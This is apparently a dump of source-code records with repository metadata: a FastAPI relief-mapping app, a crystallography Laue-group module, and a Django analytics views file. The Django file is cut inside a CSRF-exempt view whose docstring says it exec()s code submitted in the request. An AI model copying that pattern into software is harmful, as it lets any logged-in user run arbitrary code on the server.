var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
setMarkers();
initDirMap();
})
var reliability;
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
const mytable2 = document.getElementById("second-data-table");
let newBody = document.createElement("tbody");
let newBody2 = document.createElement("tbody");
mytable.appendChild(newBody)
mytable2.appendChild(newBody2)
for(var k in display_data) {
let newRow = document.createElement("tr");
let newRow2 = document.createElement("tr");
if (display_data[k][4] == reli && display_data[k][3] == dmnd){
reliability = display_data[k][0]
for(var x in display_data[k]){
let cell2 = document.createElement("td");
cell2.innerText = display_data[k][x];
newRow2.appendChild(cell2);
}
newBody2.appendChild(newRow2);
}
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
newBody.appendChild(newRow);
}
}
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been successfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, '&dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, '&dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, '&dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, '&dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, '&dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, '&dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, '&dmnd=7'],
['8', 'Demand', 27.29443927704333, 88.60976569341749, '&dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, '&reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, '&reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, '&reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, '&reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, '&reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, '&reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, '&reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, '&reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
function setMarkers(){
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
}
}
function initDirMap() {
var red, green, blue;
if ( reliability < 0.25 )
{
green = Math.round((reliability * 4 * 255));
red = 255;
}
else
{
green = 255;
red = Math.round(((2 - 4 * reliability) * 255));
}
const rgbToHex = (r, g, b) => '#' + [r, g, b].map(x => {
const hex = x.toString(16)
return hex.length === 1 ? '0' + hex : hex
}).join('')
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
origin_lat = Locations[i][2];
origin_lng = Locations[i][3];
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
dest_lat = Locations[i][2];
dest_lng = Locations[i][3];
}
}
const directionsRenderer = new google.maps.DirectionsRenderer({suppressMarkers: true, polylineOptions: { strokeColor: rgbToHex(red,green,0) }});
const directionsService = new google.maps.DirectionsService();
directionsRenderer.setMap(map);
directionsRenderer.setPanel(document.getElementById("sidebar"));
directionsService
.route({
origin: {
lat : origin_lat,
lng : origin_lng,
},
destination:{
lat: dest_lat,
lng: dest_lng,
},
travelMode: google.maps.TravelMode.DRIVING,
})
.then((response) => {
directionsRenderer.setDirections(response);
})
.catch((e) => window.alert("Directions request failed due to " + status));
}
</script>
</body>
</html>
"""
# FastAPI application; files under ./Data are served at /Data so the
# frontend can fetch the generated 'display_data' JSON directly.
app = FastAPI()
app.mount("/Data", StaticFiles(directory="Data"), name="Data")
class entry(BaseModel):
    """Pydantic request-body schema (a count plus a row key).

    Not referenced by any route visible in this file.
    NOTE(review): name violates PEP 8 (`Entry`) — kept for compatibility.
    """
    number: int
    key: str
@app.get("/")
def create_table():
return HTMLResponse(content = main_html_content, status_code = 200)
@app.get("/init/")
async def init_table():
df = pd.read_csv("Data/data.csv", encoding= "unicode_escape")
# Selecting by decision
decision = df['Decision variable'].values[0:64].astype('float')
selected = list()
for idx, item in enumerate(decision):
if (item >= 0.1):
selected.append(idx)
# Output DataFrame with selected coulumns
display_df = df.loc[selected, ['Paths' , 'Connectivity Reliability of paths (P)', \
'Number of trips (Population)', 'Reserve capacity (PCU)']]
display_df['Unserved population'] = display_df['Number of trips (Population)'] - \
display_df['Reserve capacity (PCU)']
display_df['Demand Nodes'] = display_df['Paths'].astype(str).str[1].astype(int)
display_df['Relief Points'] = display_df['Paths'].astype(str).str[3].astype(int)
display_df.drop(['Paths', 'Reserve capacity (PCU)'], axis=1, inplace=True)
display_df.reset_index(inplace = True, drop = True)
# Creating JSON for Frontend
# JSON "index": [Reliability value, Population served, Population unserved,
# Demand node, Relief point]
display_df.index += 1
with open('Data/display_data', 'w') as fp:
json.dump(display_df.T.to_dict('list'), fp, sort_keys=True, indent=4)
return HTMLResponse(content = main_html_content, status_code = 200)
@app.get("/setdemand/")
async def create_demand_node(dmnd: int):
return HTMLResponse(content = demand_html_content, status_code = 200)
@app.get("/setrelief/")
async def create_relief_node(reli: int):
return HTMLResponse(content = relief_html_content, status_code = 200)
@app.get("/handler/")
async def show_map(dmnd:int, reli: int):
return HTMLResponse(content = handler_html_content, status_code = 200)
@app.post("/tableUpdate/")
def update_table(number: int, dmnd: int, reli: int):
# JSON "index": [Reliability value, Population served, Population unserved,
# Demand node, Relief point]
with open('Data/display_data', 'r') as fp:
display_data = json.load(fp)
print("load sucessful")
print(display_data)
# Get Key and Number of People from request
# Check if Population unserved is negative, ie there is room for more population to serve
msg = ''
for row in display_data:
if (display_data[row][3] == dmnd and display_data[row][4] == reli):
if (display_data[row][2] > 0):
msg += "Relief point full. "
return JSONResponse({'msg': msg, 'status_code' : 400})
if (display_data[row][2] + number) <= 0:
display_data[row][2] += number
msg += "Update successful for %d people. "%(number)
with open('Data/display_data', 'w') as fp:
json.dump(display_data, fp, sort_keys=True, indent=4)
# Alert added to warn population limit after changes
if (display_data[row][2] > -1):
msg += "Cannot add anymore people. "
# Saving JSON at end of task
else:
msg += "Entered population value %d exceeds the population limit of the relief point. "%(number)
return JSONResponse({'msg': msg, 'status_code' : 400})
return JSONResponse({'msg': msg, 'status_code' : 200})
@app.post("/testpost/")
def testPost():
return JSONResponse({'msg': "test successfull", 'status_code' : 400})
| 38.48351
| 292
| 0.471921
| 5,761
| 61,843
| 5.040271
| 0.088873
| 0.040156
| 0.02149
| 0.015911
| 0.887178
| 0.875676
| 0.870338
| 0.865723
| 0.842305
| 0.840893
| 0
| 0.090725
| 0.394014
| 61,843
| 1,607
| 293
| 38.48351
| 0.684091
| 0.008602
| 0
| 0.814614
| 0
| 0.076455
| 0.95385
| 0.158548
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00203
| false
| 0
| 0.004736
| 0.001353
| 0.018268
| 0.001353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
44807843256e92a032fdee4a402c40453c69e34a
| 150
|
py
|
Python
|
backend/models/__init__.py
|
Luanee/MoneyThreads
|
786610855ad4d4fdda4a25a95c9e4756c6a9dedf
|
[
"MIT"
] | null | null | null |
backend/models/__init__.py
|
Luanee/MoneyThreads
|
786610855ad4d4fdda4a25a95c9e4756c6a9dedf
|
[
"MIT"
] | null | null | null |
backend/models/__init__.py
|
Luanee/MoneyThreads
|
786610855ad4d4fdda4a25a95c9e4756c6a9dedf
|
[
"MIT"
] | null | null | null |
from backend.models.users import User
from backend.models.categories import CategoryModel, SubCategoryModel
from backend.models.tags import TagsModel
| 37.5
| 69
| 0.866667
| 19
| 150
| 6.842105
| 0.578947
| 0.253846
| 0.392308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086667
| 150
| 3
| 70
| 50
| 0.948905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b9435401333c66acf602e572fa9583cbd699ea0
| 6,411
|
py
|
Python
|
crystalbase/hkl/space_group.py
|
jingshenSN2/CrystalTool
|
18f07963ff5f2a54ac2c93e2fa59fada51346232
|
[
"MIT"
] | null | null | null |
crystalbase/hkl/space_group.py
|
jingshenSN2/CrystalTool
|
18f07963ff5f2a54ac2c93e2fa59fada51346232
|
[
"MIT"
] | null | null | null |
crystalbase/hkl/space_group.py
|
jingshenSN2/CrystalTool
|
18f07963ff5f2a54ac2c93e2fa59fada51346232
|
[
"MIT"
] | null | null | null |
def generate_pairs_by_laue(hkl_tuple, laue):
    """Return the set of (h, k, l) tuples symmetry-equivalent to *hkl_tuple*.

    *laue* is an integer key into the module-level ``symmetric_operations``
    table; each operation is a triple of expression strings in h, k, l
    (e.g. ('-h-k', 'h', 'l')) evaluated against the given reflection.
    Duplicate images collapse via the set.
    """
    h, k, l = hkl_tuple
    params = {'h': h, 'k': k, 'l': l}
    # The expressions come from the trusted module-level table, but strip
    # builtins anyway so the table can never reach anything beyond plain
    # h/k/l arithmetic.
    env = {'__builtins__': {}}
    pairs = set()
    for op_h, op_k, op_l in symmetric_operations[laue]:
        pairs.add((eval(op_h, env, params),
                   eval(op_k, env, params),
                   eval(op_l, env, params)))
    return pairs
# Human-readable Hermann-Mauguin symbol for each Laue-group index used in
# this module (0 means "no Laue group"); indices match symmetric_operations.
laue_group_name = {
    0: '0',
    1: '-1',
    2: '2/m',
    3: 'mmm',
    4: '4/m',
    5: '4/mmm',
    6: '-3',
    7: '-3(R)',
    8: '-3m1',
    9: '-31m',
    10: '-3m(R)',
    11: '6/m',
    12: '6/mmm',
    13: 'm-3',
    14: 'm-3m'
}
symmetric_operations = {
0: [('h', 'k', 'l')], # no laue group
1: [('h', 'k', 'l'),
('-h', '-k', '-l')], # laue group: -1
2: [('h', 'k', 'l'),
('-h', 'k', '-l'),
('h', '-k', 'l'),
('-h', '-k', '-l')], # laue group: 2/m
3: [('h', 'k', 'l'),
('-h', '-k', '-l'),
('-h', 'k', 'l'),
('h', '-k', 'l'),
('h', 'k', '-l'),
('h', '-k', '-l'),
('-h', 'k', '-l'),
('-h', '-k', 'l')], # laue group: mmm
4: [('h', 'k', 'l'),
('-h', '-k', 'l'),
('-k', 'h', 'l'),
('k', '-h', 'l'),
('h', 'k', '-l'),
('-h', '-k', '-l'),
('-k', 'h', '-l'),
('k', '-h', '-l')], # laue group: 4/m
5: [('h', 'k', 'l'),
('-h', '-k', 'l'),
('h', '-k', 'l'),
('-h', 'k', 'l'),
('h', 'k', '-l'),
('-h', '-k', '-l'),
('h', '-k', '-l'),
('-h', 'k', '-l'),
('k', 'h', 'l'),
('-k', '-h', 'l'),
('-k', 'h', 'l'),
('k', '-h', 'l'),
('k', 'h', '-l'),
('-k', '-h', '-l'),
('-k', 'h', '-l'),
('k', '-h', '-l')], # laue group: 4/mmm
6: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l')], # laue group: -3
7: [('h', 'k', 'l'),
('l', 'h', 'k'),
('k', 'l', 'h'),
('-h', '-k', '-l'),
('-l', '-h', '-k'),
('-k', '-l', '-h')], # laue group: -3(R)
8: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l'),
('k', 'h', '-l'),
('h', '-h-k', '-l'),
('-h-k', 'k', '-l'),
('-k', '-h', 'l'),
('-h', 'h+k', 'l'),
('h+k', '-k', 'l')], # laue group: -3m1
9: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l'),
('k', 'h', 'l'),
('h', '-h-k', 'l'),
('-h-k', 'k', 'l'),
('-k', '-h', '-l'),
('-h', 'h+k', '-l'),
('h+k', '-k', '-l')], # laue group: -31m
10: [('h', 'k', 'l'),
('k', 'l', 'h'),
('l', 'h', 'k'),
('k', 'h', 'l'),
('h', 'l', 'k'),
('l', 'k', 'h'),
('-h', '-k', '-l'),
('-k', '-l', '-h'),
('-l', '-h', '-k'),
('-k', '-h', '-l'),
('-h', '-l', '-k'),
('-l', '-k', '-h')], # laue group: -3m(R)
11: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', 'l'),
('h+k', '-h', 'l'),
('-k', 'h+k', 'l'),
('h', 'k', '-l'),
('-h-k', 'h', '-l'),
('k', '-h-k', '-l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l')], # laue group: 6/m
12: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', 'l'),
('h+k', '-h', 'l'),
('-k', 'h+k', 'l'),
('k', 'h', 'l'),
('-h-k', 'k', 'l'),
('h', '-h-k', 'l'),
('-k', '-h', 'l'),
('h+k', '-k', 'l'),
('-h', 'h+k', 'l'),
('h', 'k', '-l'),
('-h-k', 'h', '-l'),
('k', '-h-k', '-l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l'),
('k', 'h', '-l'),
('-h-k', 'k', '-l'),
('h', '-h-k', '-l'),
('-k', '-h', '-l'),
('h+k', '-k', '-l'),
('-h', 'h+k', '-l')], # laue group: 6/mmm
13: [('h', 'k', 'l'),
('l', 'h', 'k'),
('k', 'l', 'h'),
('h', 'k', '-l'),
('-l', 'h', 'k'),
('k', '-l', 'h'),
('h', '-k', 'l'),
('l', 'h', '-k'),
('-k', 'l', 'h'),
('h', '-k', '-l'),
('-l', 'h', '-k'),
('-k', '-l', 'h'),
('-h', 'k', 'l'),
('l', '-h', 'k'),
('k', 'l', '-h'),
('-h', 'k', '-l'),
('-l', '-h', 'k'),
('k', '-l', '-h'),
('-h', '-k', 'l'),
('l', '-h', '-k'),
('-k', 'l', '-h'),
('-h', '-k', '-l'),
('-l', '-h', '-k'),
('-k', '-l', '-h')], # laue group: m-3
14: [('h', 'k', 'l'),
('h', 'l', 'k'),
('l', 'h', 'k'),
('l', 'k', 'h'),
('k', 'h', 'l'),
('k', 'l', 'h'),
('h', 'k', '-l'),
('h', '-l', 'k'),
('-l', 'h', 'k'),
('-l', 'k', 'h'),
('k', 'h', '-l'),
('k', '-l', 'h'),
('h', '-k', 'l'),
('h', 'l', '-k'),
('l', 'h', '-k'),
('l', '-k', 'h'),
('-k', 'h', 'l'),
('-k', 'l', 'h'),
('h', '-k', '-l'),
('h', '-l', '-k'),
('-l', 'h', '-k'),
('-l', '-k', 'h'),
('-k', 'h', '-l'),
('-k', '-l', 'h'),
('-h', 'k', 'l'),
('-h', 'l', 'k'),
('l', '-h', 'k'),
('l', 'k', '-h'),
('k', '-h', 'l'),
('k', 'l', '-h'),
('-h', 'k', '-l'),
('-h', '-l', 'k'),
('-l', '-h', 'k'),
('-l', 'k', '-h'),
('k', '-h', '-l'),
('k', '-l', '-h'),
('-h', '-k', 'l'),
('-h', 'l', '-k'),
('l', '-h', '-k'),
('l', '-k', '-h'),
('-k', '-h', 'l'),
('-k', 'l', '-h'),
('-h', '-k', '-l'),
('-h', '-l', '-k'),
('-l', '-h', '-k'),
('-l', '-k', '-h'),
('-k', '-h', '-l'),
('-k', '-l', '-h')] # laue group: m-3m
}
if __name__ == '__main__':
    # Smoke-run every real Laue group (1..14) against a sample reflection.
    for laue_index in range(1, 15):
        generate_pairs_by_laue((1, 2, 3), laue_index)
| 27.633621
| 82
| 0.185618
| 818
| 6,411
| 1.418093
| 0.062347
| 0.232759
| 0.237931
| 0.189655
| 0.64569
| 0.64569
| 0.626724
| 0.626724
| 0.613793
| 0.613793
| 0
| 0.019723
| 0.391047
| 6,411
| 231
| 83
| 27.753247
| 0.277408
| 0.038528
| 0
| 0.687225
| 1
| 0
| 0.167209
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004405
| false
| 0
| 0
| 0
| 0.008811
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2be1d2e0194261030706276985b1895671a259ad
| 14,903
|
py
|
Python
|
alarm/views.py
|
LFMP/ALARM
|
b310ebb53525826bb588bab983a45c14560c4863
|
[
"MIT"
] | 1
|
2021-01-11T18:39:27.000Z
|
2021-01-11T18:39:27.000Z
|
alarm/views.py
|
kiminh/ALARM
|
b310ebb53525826bb588bab983a45c14560c4863
|
[
"MIT"
] | null | null | null |
alarm/views.py
|
kiminh/ALARM
|
b310ebb53525826bb588bab983a45c14560c4863
|
[
"MIT"
] | 3
|
2019-08-29T22:52:20.000Z
|
2021-07-15T22:51:29.000Z
|
import json, datetime, os
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import redirect, render
from webapp.models import Adapters, Post, RecomendacaoAcessada, RecomendacaoGerada
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from statistics import median
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorHora(request):
    """Per-adapter counts of recommendations generated in each hour of today.

    Returns JSON: {rid: [count_hour_0, ..., count_hour_24]}.
    NOTE(review): range(25) yields 25 buckets but date__hour only ever
    matches 0-23, so the last bucket is always 0 — confirm whether the
    chart frontend depends on a 25-point series before changing it.
    """
    dados = {}
    hours = []
    lista = Adapters.objects.filter(ativo=1).values("rid")
    today = datetime.date.today()
    for i in lista:
        for hora in range(25):
            hours.append(RecomendacaoGerada.objects.filter(rid=i["rid"],date__year =str(today.year),date__month =str(today.month), date__day = str(today.day),date__hour=hora).count())
        inf = {i["rid"]:hours}
        hours = []
        dados.update(inf)
    return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
inf = {i["rid"]:RecomendacaoGerada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
for j in lista:
for i in range (1,today.day+1):
dias.append(RecomendacaoGerada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month),date__day = format(i, '02d')).count())
inf = {j["rid"]:dias}
dias = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
days = {}
for i in lista:
eachRec = RecomendacaoGerada.objects.filter(rid=i["rid"])
for j in eachRec:
day = str(j.date)
day = day[:10]
if day not in days:
days.update({day: eachRec.filter(date__istartswith=day,date__year =year).count()})
inf = {i["rid"]:days}
days = {}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorHora(request):
dados = {}
hours = []
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
for hora in range(25):
hours.append(RecomendacaoAcessada.objects.filter(rid=i["rid"],date__year =str(today.year),date__month =str(today.month), date__day = str(today.day),date__hour=hora).count())
inf = {i["rid"]:hours}
hours = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
inf = {i["rid"]:RecomendacaoAcessada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
for j in lista:
for i in range (1,today.day+1):
dias.append(RecomendacaoAcessada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month),date__day = format(i, '02d')).count())
inf = {j["rid"]:dias}
dias = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
days = {}
for i in lista:
eachRec = RecomendacaoAcessada.objects.filter(rid=i["rid"])
for j in eachRec:
day = str(j.date)
day = day[:10]
if day not in days:
days.update({day: eachRec.filter(date__istartswith=day,date__year =year).count()})
inf = {i["rid"]:days}
days = {}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
cliquetotal = Post.objects.filter(dateR__istartswith = today).count()
cliquerestante = 0
for i in lista:
inf = {i["rid"]:RecomendacaoAcessada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-recomendado":cliquetotal - cliquerestante})
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
cliquetotal = Post.objects.filter(dateR__year = str(year),dateR__month = str(month)).count()
cliquerestante = 0
for j in lista:
dados.update({j["rid"]:RecomendacaoAcessada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month)).count()})
cliquerestante = cliquerestante + dados[j["rid"]]
dados.update({"Não-recomendado": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
cliquerestante = 0
cliquetotal = Post.objects.filter(dateR__year = str(year)).count()
for i in lista:
eachRec = RecomendacaoAcessada.objects.filter(rid=i["rid"], date__year = year).count()
dados.update({i["rid"]:eachRec})
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-recomendado": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorGeracaoPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
cliquetotal = RecomendacaoGerada.objects.filter(date__istartswith = today).count()
cliquerestante = 0
for i in lista:
inf = {i["rid"]:RecomendacaoAcessada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-Clicada":cliquetotal - cliquerestante})
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorGeracaoPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
cliquetotal = RecomendacaoGerada.objects.filter(date__year = str(year),date__month = str(month)).count()
cliquerestante = 0
for j in lista:
dados.update({j["rid"]:RecomendacaoAcessada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month)).count()})
cliquerestante = cliquerestante + dados[j["rid"]]
dados.update({"Não-Clicada": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorGeracaoPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
cliquerestante = 0
cliquetotal = RecomendacaoGerada.objects.filter(date__year = str(year)).count()
for i in lista:
eachRec = RecomendacaoAcessada.objects.filter(rid=i["rid"], date__year = year).count()
dados.update({i["rid"]:eachRec})
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-Clicada": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecMinima(request):
    """Per-adapter minimum daily efficiency (accessed/generated * 100) for
    the current month, as JSON {rid: min_percентage_or_0}.

    NOTE(review): range(32) iterates day 0..31 (day 0 never matches) and
    str(dia) is unpadded, unlike the '02d' formatting used by the other
    views in this file; also days with zero accesses are skipped, so the
    reported minimum can never be 0% — confirm these are intentional.
    """
    dados = {}
    lista = Adapters.objects.filter(ativo=1).values("rid")
    today = datetime.date.today()
    dias = {}  # unused — kept as-is (doc-only change)
    eficiencia = []
    for i in lista:
        for dia in range(32):
            quatidadeGerada = RecomendacaoGerada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
            quatidadeAcessada = RecomendacaoAcessada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
            if quatidadeGerada != 0 and quatidadeAcessada != 0:
                eficiencia.append(quatidadeAcessada/quatidadeGerada * 100)
        if eficiencia == []:
            dados.update({i["rid"]:0})
        else:
            dados.update({i["rid"]:min(eficiencia)})
        eficiencia = []
    return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecMedia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
dias = {}
eficiencia = []
for i in lista:
for dia in range(32):
quatidadeGerada = RecomendacaoGerada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
quatidadeAcessada = RecomendacaoAcessada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
if quatidadeGerada != 0 and quatidadeAcessada != 0:
eficiencia.append(quatidadeAcessada/quatidadeGerada * 100)
if eficiencia == []:
dados.update({i["rid"]:0})
else:
dados.update({i["rid"]:median(eficiencia)})
eficiencia = []
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecMaxima(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
dias = {}
eficiencia = []
for i in lista:
for dia in range(32):
quatidadeGerada = RecomendacaoGerada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
quatidadeAcessada = RecomendacaoAcessada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
if quatidadeGerada != 0 and quatidadeAcessada != 0:
eficiencia.append(quatidadeAcessada/quatidadeGerada * 100)
if eficiencia == []:
dados.update({i["rid"]:0})
else:
dados.update({i["rid"]:max(eficiencia)})
eficiencia = []
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def recomenderclick(request):
return JsonResponse({"caminho":"ok"})
@login_required(login_url='../admin/login/')
@csrf_exempt
def code(request):
    """Save a user-submitted recommender algorithm as a .py file.

    POST body: JSON {"nome": <file name>, "valor": <python source>}.
    The submitted code is smoke-tested via exec() against a random Post,
    then written to webapp/algorithms/<nome>.py and registered as an
    Adapters row.  GET renders the code-editor page.

    SECURITY: exec() of request-supplied source is arbitrary code execution
    on the server, gated only by login_required (and csrf_exempt!) — any
    authenticated account can run code here.  Review before exposing.
    """
    if request.method == 'POST':
        data = json.loads(request.body.decode('UTF-8'))
        fileName = data["nome"]
        codigo = data["valor"]
        dir_path = os.path.dirname(os.path.realpath(__file__))
